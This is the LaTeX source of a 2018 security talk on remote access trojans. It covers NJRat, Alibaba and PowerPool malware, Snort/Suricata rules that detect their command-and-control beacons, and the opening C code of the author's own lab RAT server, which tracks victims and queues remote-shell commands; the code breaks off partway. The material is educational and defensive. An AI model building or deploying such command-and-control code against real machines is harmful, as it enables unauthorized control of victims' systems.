-------------------------------------------------------------------------------- /docs/img/swamp-rat.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/swamp-rat.png -------------------------------------------------------------------------------- /docs/img/tcp_xor_dataframe.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/tcp_xor_dataframe.png -------------------------------------------------------------------------------- /docs/img/team_work.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/team_work.jpg -------------------------------------------------------------------------------- /docs/img/thank_you.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/thank_you.jpg -------------------------------------------------------------------------------- /docs/img/thats_all_you_got.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/thats_all_you_got.jpeg -------------------------------------------------------------------------------- /docs/img/user_support.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/user_support.jpeg -------------------------------------------------------------------------------- /docs/img/user_support.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/user_support.jpg -------------------------------------------------------------------------------- /docs/img/what_are_you_doing.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/what_are_you_doing.jpg -------------------------------------------------------------------------------- /docs/img/whats_wrong_here.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/whats_wrong_here.jpg -------------------------------------------------------------------------------- /docs/img/wikileaks.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/wikileaks.jpg -------------------------------------------------------------------------------- /docs/img/wild_rat.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/wild_rat.jpg -------------------------------------------------------------------------------- /docs/img/xor_gate.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/xor_gate.gif -------------------------------------------------------------------------------- /docs/img/xor_gate.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/xor_gate.jpg -------------------------------------------------------------------------------- /docs/img/xor_truth_table.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/xor_truth_table.jpg -------------------------------------------------------------------------------- /docs/swamp-rat.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/swamp-rat.pdf -------------------------------------------------------------------------------- /docs/swamp-rat.tex: -------------------------------------------------------------------------------- 1 | % Swamp RAT 2 | % Copyright (C) 2018 Lilly Chalupowski 3 | 4 | % This program is free software: you can redistribute it and/or modify 5 | % it under the terms of the GNU General Public License as published by 6 | % the Free Software Foundation, either version 3 of the License, or 7 | % (at your option) any later version. 8 | 9 | % This program is distributed in the hope that it will be useful, 10 | % but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | % MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | % GNU General Public License for more details. 13 | 14 | % You should have received a copy of the GNU General Public License 15 | % along with this program. If not, see . 16 | 17 | \documentclass[aspectratio=169]{beamer} 18 | \usepackage{tabularx} 19 | \usepackage{graphicx} 20 | \usepackage{eso-pic} 21 | \usepackage{minted} 22 | \usepackage{hyperref} 23 | \usepackage{tcolorbox} 24 | 25 | \makeatletter 26 | \newenvironment{myitemize}{% 27 | \setlength{\topsep}{0pt} 28 | \setlength{\partopsep}{0pt} 29 | \renewcommand*{\@listi}{\leftmargin\leftmargini \parsep\z@ \topsep\z@ \itemsep\z@} 30 | \let\@listI\@listi 31 | \itemize 32 | }{\enditemize} 33 | \makeatother 34 | 35 | \graphicspath{{img/}} 36 | 37 | \usetheme{Warsaw} 38 | \usemintedstyle{monokai} 39 | 40 | \setbeamercolor{normal text}{fg=white,bg=black!90} 41 | \setbeamercolor{structure}{fg=white} 42 | \setbeamercolor{alerted text}{fg=red!85!black} 43 | \setbeamercolor{item projected}{use=item,fg=black,bg=item.fg!35} 44 | \setbeamercolor*{palette primary}{use=structure,fg=structure.fg} 45 | \setbeamercolor*{palette secondary}{use=structure,fg=structure.fg!95!black} 46 | \setbeamercolor*{palette tertiary}{use=structure,fg=structure.fg!90!black} 47 | \setbeamercolor*{palette quaternary}{use=structure,fg=structure.fg!95!black,bg=black!80} 48 | \setbeamercolor*{framesubtitle}{fg=white} 49 | \setbeamercolor*{block title}{parent=structure,bg=black!60} 50 | \setbeamercolor*{block body}{fg=black,bg=black!10} 51 | \setbeamercolor*{block title alerted}{parent=alerted text,bg=black!15} 52 | \setbeamercolor*{block title example}{parent=example text,bg=black!15} 53 | \setbeamertemplate{navigation symbols}{} 54 | \setbeamercolor{footercolor}{fg=white,bg=black} 55 | 56 | \makeatletter 57 | \defbeamertemplate*{footline}{myfootline} 58 | { 59 | \leavevmode% 60 | \hbox{% 61 | \begin{beamercolorbox}[wd=.333333\paperwidth,ht=2.25ex,dp=1ex,center]{footercolor}% 62 | \insertshorttitle 63 | \end{beamercolorbox}% 64 | \begin{beamercolorbox}[wd=.333333\paperwidth,ht=2.25ex,dp=1ex,center]{footercolor}% 65 | \insertshortauthor\expandafter\beamer@ifempty\expandafter{\beamer@shortinstitute}{}{~~(\insertshortinstitute)} 66 | \end{beamercolorbox}% 67 | \begin{beamercolorbox}[wd=.333333\paperwidth,ht=2.25ex,dp=1ex,right]{footercolor}% 68 | \insertshortdate{}\hspace*{2em} 69 | \insertframenumber{} / \inserttotalframenumber\hspace*{2ex} 70 | \end{beamercolorbox}}% 71 | \vskip0pt% 72 | } 73 | \makeatother 74 | 75 | \title{Don't RAT Me OUT!} 76 | 77 | \institute{GoSecure} 78 | \author{Lilly Chalupowski} 79 | \date{October 30, 2018} 80 | 81 | \begin{document} 82 | 83 | \setbeamertemplate{footline}{} 84 | \begin{frame}[t] 85 | \begin{center} 86 | \begingroup 87 | \fontsize{20pt}{20pt}\selectfont 88 | \inserttitle \\ 89 | \endgroup 90 | \bigskip 91 | \includegraphics[scale=0.45]{wikileaks} \\ 92 | \bigskip 93 | \insertauthor \\ 94 | \insertdate 95 | \end{center} 96 | \end{frame} 97 | 98 | \setbeamertemplate{footline}[myfootline] 99 | 100 | \begin{frame} 101 | \frametitle{whois lilly.chalupowski} 102 | \begin{table} 103 | \caption{\textit{who.is results}} 104 | \begin{tabularx}{\textwidth}{|X|X|} 105 | \hline 106 | Name & Lilly Chalupowski \\ 107 | \hline 108 | Status & Employed \\ 109 | \hline 110 | Creation Date & 1986/11/29 \\ 111 | \hline 112 | Expiry & A Long Time from Now \\ 113 | \hline 114 | Registrant Name & GoSecure \\ 115 | \hline 116 | Administrative contact & Travis Barlow \\ 117 | \hline 118 | Job & Security Application Developer - Threat Intelligence \\ 119 | \hline 120 | \end{tabularx} 121 | \end{table} 122 | \end{frame} 123 | 124 | \begin{frame} 125 | \frametitle{Agenda} 126 | \framesubtitle{What will we cover?} 127 | \begin{itemize} 128 | \item{Disclaimer} 129 | \item{What is a RAT?} 130 | \item{Brief History of the RAT} 131 | \item{Wild RATs} 132 | \item{Why build a RAT?} 133 | \item{The Laboratory RAT} 134 | \begin{itemize} 135 | \item{CnC Server} 136 | \item{Victim Sessions} 137 | \item{Command Queue} 138 | \item{NCurses} 139 | \end{itemize} 140 | \item{Evasion} 141 | \begin{itemize} 142 | \item{NIDS (Network Intrusion Detection)} 143 | \item{Debugging} 144 | \item{Virtual Machines} 145 | \end{itemize} 146 | \item{Anyone else doing it right?} 147 | \item{POC / Demo / Questions} 148 | \end{itemize} 149 | \end{frame} 150 | 151 | \begin{frame} 152 | \frametitle{Disclaimer} 153 | \framesubtitle{Don't be a Criminal} 154 | \begin{tcolorbox}[title=disclaimer.log,colback=gray] 155 | The tools and techniques covered in this presentation can be dangerous and are\\ 156 | being shown for educational purposes.\\ 157 | \newline 158 | It is a violation of Federal laws to attempt gaining unauthorized access to information, assets or systems belonging to others, or to exceed authorization on systems for which you have not been granted.\\ 159 | \newline 160 | Only use these tools with/on systems you own or have written permission from the owner. I (the speaker) do not assume any responsibility and shall not be held liable for any illegal use of these tools.\\ 161 | \end{tcolorbox} 162 | \end{frame} 163 | 164 | \begin{frame} 165 | \frametitle{What is a RAT?} 166 | \begin{center} 167 | \includegraphics[width=5cm,keepaspectratio]{question_mark} 168 | \end{center} 169 | \end{frame} 170 | 171 | \begin{frame} 172 | \frametitle{What is a RAT?} 173 | \framesubtitle{The Animal} 174 | \begin{center} 175 | \begin{figure} 176 | \includegraphics[width=5cm,keepaspectratio]{rat_animal} 177 | \caption{Army RAT!} 178 | \end{figure} 179 | \end{center} 180 | \end{frame} 181 | 182 | \begin{frame} 183 | \frametitle{What is a RAT} 184 | \framesubtitle{The Tool} 185 | \begin{center} 186 | \begin{figure} 187 | \includegraphics[width=10cm,keepaspectratio]{darkcomet_rat} 188 | \caption{Darkcomet RAT} 189 | \end{figure} 190 | \end{center} 191 | \end{frame} 192 | 193 | \begin{frame} 194 | \frametitle{History of the RAT} 195 | \begin{center} 196 | \includegraphics[width=11cm,keepaspectratio]{history} 197 | \end{center} 198 | \end{frame} 199 | 200 | \begin{frame} 201 | \frametitle{History of the RAT} 202 | \framesubtitle{System Administrators} 203 | \begin{itemize} 204 | \item{Central management} 205 | \item{Supporting larger user base} 206 | \item{Fixing issues remotely} 207 | \item{Solved user issues issues} 208 | \end{itemize} 209 | \end{frame} 210 | 211 | \begin{frame} 212 | \frametitle{History of the RAT} 213 | \framesubtitle{To Support the Users} 214 | \begin{center} 215 | \begin{figure} 216 | \includegraphics[width=9cm,keepaspectratio]{user_support} 217 | \caption{This used to be my life...} 218 | \end{figure} 219 | \end{center} 220 | \end{frame} 221 | 222 | \begin{frame} 223 | \frametitle{History of the RAT} 224 | \framesubtitle{Well that Escalated Quickly} 225 | \begin{center} 226 | \includegraphics[width=6.5cm,keepaspectratio]{escalated_quickly_rat} 227 | \end{center} 228 | \end{frame} 229 | 230 | \begin{frame} 231 | \frametitle{Wild RATs} 232 | \begin{center} 233 | \begin{figure} 234 | \includegraphics[width=9cm,keepaspectratio]{wild_rat} 235 | \caption{Wild Rats Eating Garbage} 236 | \end{figure} 237 | \end{center} 238 | \end{frame} 239 | 240 | \begin{frame} 241 | \frametitle{Wild RATs} 242 | \begin{center} 243 | \begin{figure} 244 | \includegraphics[width=11cm,keepaspectratio]{njrat} 245 | \caption{NJRat in the Wild} 246 | \end{figure} 247 | \end{center} 248 | \end{frame} 249 | 250 | \begin{frame} 251 | \frametitle{Wild RATs} 252 | \framesubtitle{NJRat Whitepaper Article} 253 | \begin{center} 254 | \begin{figure} 255 | \includegraphics[width=12cm,keepaspectratio]{njrat_article} 256 | \caption{NJRat Whitepaper Article from 360 Research} 257 | \end{figure} 258 | \end{center} 259 | \end{frame} 260 | 261 | \begin{frame} 262 | \frametitle{Wild RATs} 263 | \framesubtitle{NJRat Whitepaper Article - And that is it!} 264 | \begin{center} 265 | \begin{figure} 266 | \includegraphics[width=9cm,keepaspectratio]{now_what_do_i_do} 267 | \caption{Now what do I do?} 268 | \end{figure} 269 | \end{center} 270 | \end{frame} 271 | 272 | \begin{frame} 273 | \frametitle{Wild RATs} 274 | \framesubtitle{NJRat CnC Code} 275 | \begin{center} 276 | \begin{figure} 277 | \includegraphics[width=5.8cm,keepaspectratio]{njrat_cnc} 278 | \caption{NJRat Decompiled CnC Code after Unpacking} 279 | \end{figure} 280 | \end{center} 281 | \end{frame} 282 | 283 | \begin{frame} 284 | \frametitle{Wild RATs} 285 | \framesubtitle{NJRat CnC Code} 286 | \begin{center} 287 | \begin{figure} 288 | \includegraphics[width=8cm,keepaspectratio]{njrat_strings} 289 | \caption{NJRat Interesting Strings} 290 | \end{figure} 291 | \end{center} 292 | \end{frame} 293 | 294 | \begin{frame}[fragile]{} 295 | \frametitle{Wild RATs} 296 | \framesubtitle{NJRat Detection} 297 | \begin{center} 298 | \begin{tcolorbox}[title=njrat.rules,colback=black] 299 | \begin{minipage}{0.5\textwidth} 300 | \begin{minted}[fontsize=\tiny]{c} 301 | alert tcp any any -> \$EXTERNAL_NET any ( 302 | msg:"NJRat/Bladabindi APT-C-27 Variant CnC Beacon"; 303 | content:"medo2|2a 5f 5e|"; nocase; fast_pattern; 304 | pcre:"/(inf|kl|msg|pl)medo2\x2a\x5f\x5e[a-z,0-9,\+\/,\=]{1,}/i"; 305 | flow:to_server,established; 306 | reference:md5,382788bb234b75a35b80ac69cb7ba306; 307 | reference:url,https://ti.360.net/blog/articles/analysis-of-apt-c-27; 308 | classtype:trojan-activity; 309 | sid:2000000; 310 | rev:01; 311 | ) 312 | \end{minted} 313 | \end{minipage} 314 | \end{tcolorbox} 315 | \end{center} 316 | \end{frame} 317 | 318 | \begin{frame} 319 | \frametitle{Wild RATs} 320 | \framesubtitle{Alibaba Malware Article - 6900bbd0b505126c4461ae21bb4cf85d} 321 | \begin{center} 322 | \begin{figure} 323 | \includegraphics[width=9cm,keepaspectratio]{alibaba_article_0} 324 | \caption{Alibaba Malware Article} 325 | \end{figure} 326 | \end{center} 327 | \end{frame} 328 | 329 | \begin{frame} 330 | \frametitle{Wild RATs} 331 | \framesubtitle{Alibaba Malware Article CnC Analysis - 6900bbd0b505126c4461ae21bb4cf85d} 332 | \begin{center} 333 | \begin{figure} 334 | \includegraphics[width=9cm,keepaspectratio]{alibaba_article_1} 335 | \caption{Alibaba Malware Article Entire CnC Analysis} 336 | \end{figure} 337 | \end{center} 338 | \end{frame} 339 | 340 | \begin{frame} 341 | \frametitle{Wild RATs} 342 | \framesubtitle{Alibaba Malware Article CnC Analysis - 6900bbd0b505126c4461ae21bb4cf85d} 343 | \begin{center} 344 | \begin{figure} 345 | \includegraphics[width=9cm,keepaspectratio]{thats_all_you_got} 346 | \caption{Seriously?} 347 | \end{figure} 348 | \end{center} 349 | \end{frame} 350 | 351 | \begin{frame} 352 | \frametitle{Wild RATs} 353 | \framesubtitle{Alibaba Malware Analysis - What are we dealing with?} 354 | \begin{center} 355 | \begin{figure} 356 | \includegraphics[width=9cm,keepaspectratio]{alibaba_die_main} 357 | \caption{Alibaba Malware Detect It Easy} 358 | \end{figure} 359 | \end{center} 360 | \end{frame} 361 | 362 | \begin{frame} 363 | \frametitle{Wild RATs} 364 | \framesubtitle{Alibaba Malware Analysis - Entropy} 365 | \begin{center} 366 | \begin{figure} 367 | \includegraphics[width=9cm,keepaspectratio]{alibaba_die_entropy} 368 | \caption{Alibaba Malware Entropy} 369 | \end{figure} 370 | \end{center} 371 | \end{frame} 372 | 373 | \begin{frame} 374 | \frametitle{Wild RATs} 375 | \framesubtitle{Alibaba Malware Analysis - Debugging and Capturing} 376 | \begin{center} 377 | \begin{figure} 378 | \includegraphics[width=14cm,keepaspectratio]{alibaba_cnc} 379 | \caption{Afer Unpacking and Breaking on Send} 380 | \end{figure} 381 | \end{center} 382 | \end{frame} 383 | 384 | \begin{frame} 385 | \frametitle{Wild RATs} 386 | \framesubtitle{Alibaba Malware Analysis - The CnC Beacon} 387 | \begin{center} 388 | \begin{figure} 389 | \includegraphics[width=14cm,keepaspectratio]{alibaba_http} 390 | \caption{The CnC Beacon} 391 | \end{figure} 392 | \end{center} 393 | \end{frame} 394 | 395 | \begin{frame} 396 | \frametitle{Wild RATs} 397 | \framesubtitle{Alibaba Malware Analysis - When you see it...} 398 | \begin{center} 399 | \begin{figure} 400 | \includegraphics[width=7cm,keepaspectratio]{whats_wrong_here} 401 | \caption{When you see it...} 402 | \end{figure} 403 | \end{center} 404 | \end{frame} 405 | 406 | \begin{frame} 407 | \frametitle{Wild RATs} 408 | \framesubtitle{Alibaba Malware Analysis - The CnC Beacon} 409 | \begin{center} 410 | \begin{figure} 411 | \includegraphics[width=14cm,keepaspectratio]{alibaba_http} 412 | \caption{The CnC Beacon} 413 | \end{figure} 414 | \end{center} 415 | \end{frame} 416 | 417 | \begin{frame} 418 | \frametitle{Wild RATs} 419 | \framesubtitle{Alibaba Malware Analysis - The CnC Beacon} 420 | \begin{center} 421 | \begin{figure} 422 | \includegraphics[width=14cm,keepaspectratio]{alibaba_http_highlight} 423 | \caption{The CnC Beacon} 424 | \end{figure} 425 | \end{center} 426 | \end{frame} 427 | 428 | \begin{frame} 429 | \frametitle{Wild RATs} 430 | \framesubtitle{Alibaba Malware Analysis - Demo Video} 431 | \begin{center} 432 | \begin{figure} 433 | \includegraphics[width=8cm,keepaspectratio]{show_me_a_demo} 434 | \caption{Show me a demo!} 435 | \end{figure} 436 | \end{center} 437 | \end{frame} 438 | 439 | \begin{frame} 440 | \frametitle{Wild RATs} 441 | \framesubtitle{Alibaba Malware Analysis - What?} 442 | \begin{center} 443 | \begin{figure} 444 | \includegraphics[width=8cm,keepaspectratio]{what_are_you_doing} 445 | \caption{Really?} 446 | \end{figure} 447 | \end{center} 448 | \end{frame} 449 | 450 | \begin{frame}[fragile]{} 451 | \frametitle{Wild RATs} 452 | \framesubtitle{Alibaba Malware} 453 | \begin{center} 454 | \begin{tcolorbox}[title=alibaba.rules,colback=black] 455 | \begin{minipage}{0.5\textwidth} 456 | \begin{minted}[fontsize=\tiny]{c} 457 | alert http any any -> \$EXTERNAL_NET any ( 458 | msg:"Alibaba CnC Checkin"; 459 | content:"POST"; http_method; 460 | content:"Content-type|3a 20|multipart/form-data|3b|boundary="; http_header; fast_pattern; 461 | pcre:"/\:\d{1,5}/iH"; 462 | content:"Content-Disposition|3a 20|multipart/form-data|3b 20|name=|22|kind|22|"; 463 | content:"Content-Disposition|3a 20|multipart/form-data|3b 20|name=|22|fname|22 3b|"; 464 | content:"|be 02 00 00|BX|00 00 00|PV|9b 8a|U"; 465 | flow:to_server,established; 466 | reference:url,http://sfkino.tistory.com/70; 467 | classtype:trojan-activity; 468 | sid:2000001; 469 | rev:1; 470 | ) 471 | \end{minted} 472 | \end{minipage} 473 | \end{tcolorbox} 474 | \end{center} 475 | \end{frame} 476 | 477 | \begin{frame} 478 | \frametitle{Wild RATs} 479 | \framesubtitle{PowerPool Malware Analysis} 480 | \begin{center} 481 | \begin{figure} 482 | \includegraphics[width=7cm,keepaspectratio]{power_pool_meme} 483 | \caption{PowerPool Malware} 484 | \end{figure} 485 | \end{center} 486 | \end{frame} 487 | 488 | \begin{frame} 489 | \frametitle{Wild RATs} 490 | \framesubtitle{PowerPool Malware Analysis - 80e7a7789286d3fb69f083f1a2dddbe6} 491 | \begin{center} 492 | \begin{figure} 493 | \includegraphics[width=14cm,keepaspectratio]{powerpool_article} 494 | \caption{PowerPool Whitepaper Article} 495 | \end{figure} 496 | \end{center} 497 | \end{frame} 498 | 499 | \begin{frame} 500 | \frametitle{Wild RATs} 501 | \framesubtitle{PowerPool Malware Analysis - 80e7a7789286d3fb69f083f1a2dddbe6} 502 | \begin{center} 503 | \begin{figure} 504 | \includegraphics[width=6cm,keepaspectratio]{really_guy_all_you_got} 505 | \caption{Really?} 506 | \end{figure} 507 | \end{center} 508 | \end{frame} 509 | 510 | \begin{frame} 511 | \frametitle{Wild RATs} 512 | \framesubtitle{PowerPool Malware Analysis - 80e7a7789286d3fb69f083f1a2dddbe6} 513 | \begin{center} 514 | \begin{figure} 515 | \includegraphics[width=9cm,keepaspectratio]{powerpool_anti_debug} 516 | \caption{PowerPool Anti-Debug / Anti-Analysis} 517 | \end{figure} 518 | \end{center} 519 | \end{frame} 520 | 521 | \begin{frame} 522 | \frametitle{Wild RATs} 523 | \framesubtitle{PowerPool Malware Analysis - 80e7a7789286d3fb69f083f1a2dddbe6} 524 | \begin{center} 525 | \begin{figure} 526 | \includegraphics[width=6.5cm,keepaspectratio]{powerpool_main_thread} 527 | \caption{PowerPool Main Thread} 528 | \end{figure} 529 | \end{center} 530 | \end{frame} 531 | 532 | \begin{frame} 533 | \frametitle{Wild RATs} 534 | \framesubtitle{PowerPool Malware Analysis - Demo Video} 535 | \begin{center} 536 | \begin{figure} 537 | \includegraphics[width=7cm,keepaspectratio]{demo_baby} 538 | \caption{Demo Baby} 539 | \end{figure} 540 | \end{center} 541 | \end{frame} 542 | 543 | \begin{frame}[fragile]{} 544 | \frametitle{Wild RATs} 545 | \framesubtitle{PowerPool Malware Analysis - Detection} 546 | \begin{center} 547 | \begin{tcolorbox}[title=powerpool.rules,colback=black] 548 | \begin{minipage}{0.5\textwidth} 549 | \begin{minted}[fontsize=\tiny]{c} 550 | alert http any any -> \$EXTERNAL_NET any ( 551 | msg:"PowerPool CnC Heartbeat Beacon"; 552 | content:"POST"; http_method; 553 | content:"Content-Type|3a 20|application/x-www-form-urlencoded"; http_header; fast_pattern; 554 | content:"/heart"; http_uri; 555 | pcre:"/json\=\{\x0a\x20{1,}\x22sessionid\x22\x20{1,}\:\s{1,} 556 | \x22\{[a-f,0-9]{8}\-[a-f,0-9]{4}\-[a-f,0-9]{4}\- 557 | [a-f,0-9]{4}\-[a-f,0-9]{12}\}\x22\x0a\}/iP"; 558 | reference:url,https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/; 559 | sid:2000002; 560 | rev:1; 561 | ) 562 | \end{minted} 563 | \end{minipage} 564 | \end{tcolorbox} 565 | \end{center} 566 | \end{frame} 567 | 568 | \begin{frame} 569 | \frametitle{Wild RATs} 570 | \framesubtitle{They are good at teamwork!} 571 | \begin{center} 572 | \begin{figure} 573 | \includegraphics[width=7cm,keepaspectratio]{team_work} 574 | \caption{Go Team!} 575 | \end{figure} 576 | \end{center} 577 | \end{frame} 578 | 579 | \begin{frame} 580 | \frametitle{Why Build a RAT?} 581 | \begin{center} 582 | \begin{figure} 583 | \includegraphics[width=12cm,keepaspectratio]{hackers_meme} 584 | \caption{Hackers IRL} 585 | \end{figure} 586 | \end{center} 587 | \end{frame} 588 | 589 | \begin{frame} 590 | \frametitle{Why Build a RAT?} 591 | \framesubtitle{Because Linux} 592 | \begin{itemize} 593 | \item{Linux} 594 | \item{C Programming Language} 595 | \item{Learning Experience} 596 | \item{Find Detection Limitations} 597 | \item{Research the Linux Malware Ecosystem} 598 | \item{Some RATs fall Short (NJRat)} 599 | \item{Because I Can} 600 | \end{itemize} 601 | \end{frame} 602 | 603 | \begin{frame} 604 | \frametitle{The Laboratory RAT} 605 | \begin{center} 606 | \includegraphics[width=5cm,keepaspectratio]{lab_rat} 607 | \end{center} 608 | \end{frame} 609 | 610 | \begin{frame} 611 | \frametitle{CnC Server} 612 | \framesubtitle{In the C Programming Language} 613 | \begin{itemize} 614 | \item{Sockets} 615 | \begin{itemize} 616 | \item{Create} 617 | \item{Bind} 618 | \item{Listen} 619 | \item{Accept} 620 | \item{Receive} 621 | \item{Process} 622 | \item{Send} 623 | \end{itemize} 624 | \item{PThreads} 625 | \end{itemize} 626 | \end{frame} 627 | 628 | \begin{frame} 629 | \frametitle{CnC Server} 630 | \framesubtitle{It can be painful when written in C} 631 | \begin{center} 632 | \begin{figure} 633 | \includegraphics[width=10cm,keepaspectratio]{everything_hurts} 634 | \caption{Leslie Knope} 635 | \end{figure} 636 | \end{center} 637 | \end{frame} 638 | 639 | \begin{frame}[fragile]{} 640 | \frametitle{CnC Server} 641 | \framesubtitle{Data Structure for Victims/Clients} 642 | \begin{center} 643 | \begin{tcolorbox}[title=net.c,colback=black] 644 | \begin{minipage}{0.5\textwidth} 645 | \begin{minted}[fontsize=\tiny]{c} 646 | #ifndef NET_CLIENT_BEACON 647 | typedef struct{ 648 | int xor_key; // Packet XOR Key 649 | sys_info_t sysinfo; // System Info Data Structure 650 | } net_client_beacon_t; 651 | #define NET_CLIENT_BEACON 652 | #endif 653 | 654 | #ifndef SYS_INFO 655 | typedef struct{ 656 | char uuid[SYS_UUID_SIZE]; // Victim UUID 657 | char ip[SYS_PUBLIC_IP_SIZE]; // Public IP Address 658 | char username[SYS_USERNAME_SIZE]; // Username 659 | char hostname[SYS_HOSTNAME_SIZE]; // Hostname 660 | `char release[SYS_RELEASE_SIZE]; // Kernel Version 661 | char arch[SYS_ARCH_SIZE]; // Architecture 662 | int cpu_usage; // CPU Usage 663 | int ping; // Ping / Internet Speed 664 | } sys_info_t; 665 | #define SYS_INFO 666 | #endif 667 | \end{minted} 668 | \end{minipage} 669 | \end{tcolorbox} 670 | \end{center} 671 | \end{frame} 672 | 673 | \begin{frame}[fragile]{} 674 | \frametitle{CnC Server} 675 | \framesubtitle{Create Victims Memory Data Structure} 676 | \begin{center} 677 | \begin{tcolorbox}[title=net.c,colback=black] 678 | \begin{minipage}{0.5\textwidth} 679 | \begin{minted}[fontsize=\tiny]{c} 680 | net_client_beacon_t **net_create_victims(){ 681 | int count = NET_MAX_CLIENTS; // Get Max Supported Clients Count 682 | net_client_beacon_t **v; // Create Pointer to Data Structure 683 | v = malloc(count * sizeof(net_client_beacon_t)); // Allocate Memory for Data Array 684 | if (v == NULL){ // Error Checking 685 | fprintf(stderr, "[x] %s\n", strerror(errno)); 686 | exit(EXIT_FAILURE); 687 | } 688 | for (int i = 0; i < count; i++){ // Set to NULL 689 | v[i] = NULL; 690 | } 691 | return v; // Return Pointer to Data Structure Array 692 | } 693 | \end{minted} 694 | \end{minipage} 695 | \end{tcolorbox} 696 | \end{center} 697 | \end{frame} 698 | 699 | \begin{frame}[fragile]{} 700 | \frametitle{CnC Server} 701 | \framesubtitle{Data Structure for Command Queue} 702 | \begin{center} 703 | \begin{tcolorbox}[title=net.c,colback=black] 704 | \begin{minipage}{0.5\textwidth} 705 | \begin{minted}[fontsize=\tiny]{c} 706 | #ifndef NET_SERVER_CMD_BEACON 707 | typedef struct{ 708 | int xor_key; // XOR Key 709 | bool status; // Status 710 | int command; // Command 711 | char uuid[SYS_UUID_SIZE]; // UUID 712 | char data[NET_MAX_DATA_SIZE]; // Data 713 | } net_server_beacon_t; 714 | #define NET_SERVER_CMD_BEACON 0 715 | typedef struct{ 716 | char host[NET_DOMAIN_MAX]; // Host 717 | int port; // Port 718 | } net_server_cmd_shell_t; 719 | #define NET_SERVER_CMD_SHELL 1 720 | #endif 721 | \end{minted} 722 | \end{minipage} 723 | \end{tcolorbox} 724 | \end{center} 725 | \end{frame} 726 | 727 | \begin{frame}[fragile]{} 728 | \frametitle{CnC Server} 729 | \framesubtitle{Create Commands Memory Data Structure} 730 | \begin{center} 731 | \begin{tcolorbox}[title=net.c,colback=black] 732 | \begin{minipage}{0.5\textwidth} 733 | \begin{minted}[fontsize=\tiny]{c} 734 | net_server_beacon_t **net_create_commands(){ 735 | int count = NET_MAX_CLIENTS; // Get Max Supported Clients Count 736 | net_server_beacon_t **v; // Create Pointer to Data Structure 737 | v = malloc(count * sizeof(net_server_beacon_t)); // Allocate Memory for Data Array 738 | if (v == NULL){ // Error Checking 739 | fprintf(stderr, "[x] %s\n", strerror(errno)); 740 | exit(EXIT_FAILURE); 741 | } 742 | for (int i = 0; i < count; i++){ // Set to NULL 743 | v[i] = NULL; 744 | } 745 | return v; // Return Pointer to Data Structure Array 746 | } 747 | \end{minted} 748 | \end{minipage} 749 | \end{tcolorbox} 750 | \end{center} 751 | \end{frame} 752 | 753 | \begin{frame}[fragile]{} 754 | \frametitle{CnC Server} 755 | \framesubtitle{Command and Control in C Sockets 0} 756 | \begin{center} 757 | \begin{tcolorbox}[title=net.c,colback=black] 758 | \begin{minipage}{0.5\textwidth} 759 | \begin{minted}[fontsize=\tiny]{c} 760 | bool net_server(int port, 761 | net_client_beacon_t **p_victims, // Victims Memory Array 762 | net_server_beacon_t **p_commands){ // Commands Memory Array 763 | int server_fd, client_fd; 764 | struct sockaddr_in server, client; 765 | server_fd = socket(AF_INET, SOCK_STREAM, 0); // Create Socket File Descriptor 766 | if (server_fd < 0){ // Error Checking for Socket 767 | fprintf(stderr, "[x] %s\n", strerror(errno)); 768 | return false; 769 | } 770 | if (setsockopt(server_fd, // Socket File Descriptor 771 | SOL_SOCKET, // Manipulate Socket Options 772 | SO_REUSEADDR, // Permit Local Host Reuse 773 | &(int){ 1 }, 774 | sizeof(int)) < 0){ 775 | fprintf(stderr, "[-] %s\n", strerror(errno)); 776 | } 777 | memset(&server, 0, sizeof(server)); // Zero Out Server Struct 778 | server.sin_family = AF_INET; // Set TCP Type 779 | server.sin_port = htons(port); // Set Port 780 | server.sin_addr.s_addr = htonl(INADDR_ANY); // Any Addresses 781 | // continued here... 782 | } 783 | \end{minted} 784 | \end{minipage} 785 | \end{tcolorbox} 786 | \end{center} 787 | \end{frame} 788 | 789 | \begin{frame}[fragile]{} 790 | \frametitle{CnC Server} 791 | \framesubtitle{Command and Control in C Sockets 1} 792 | \begin{center} 793 | \begin{tcolorbox}[title=net.c,colback=black] 794 | \begin{minipage}{0.5\textwidth} 795 | \begin{minted}[fontsize=\tiny]{c} 796 | if (bind(server_fd, (struct sockaddr *) &server, sizeof(server)) < 0){ return false; } // Bind to Socket 797 | if (listen(server_fd, NET_MAX_CLIENTS) != 0){ return false; } // Listen to Socket 798 | while (true){ 